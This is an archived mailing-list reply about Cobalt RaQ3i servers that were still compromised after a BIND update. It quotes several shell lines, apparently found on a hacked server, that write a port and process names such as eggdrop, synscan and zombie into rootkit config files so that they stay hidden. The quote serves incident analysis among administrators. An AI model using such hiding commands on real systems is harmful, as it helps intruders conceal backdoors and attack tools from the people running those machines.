[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-security] Re: RaQ3i are still vulnerable AFTER BIND update..



Hi Paul,

> Here goes, I'll warn you though it doesn't make pretty reading!

echo 3 8888 >> /usr/src/.puta/.1addr
echo 2 eggdrop >> /usr/src/.puta/.1proc
echo 2 screen >> /usr/src/.puta/.1proc
echo 2 SCREEN >> /usr/src/.puta/.1proc
echo 2 synscan >> /usr/src/.puta/.1proc
echo 2 syn >> /usr/src/.puta/.1proc
echo 2 zombie >> /usr/src/.puta/.1proc

Oh yeah. The above is sending those processes into hiding. Seen that a lot in 
the past.

-- 

With best regards,

Michael Stauber
SOLARSPEED.NET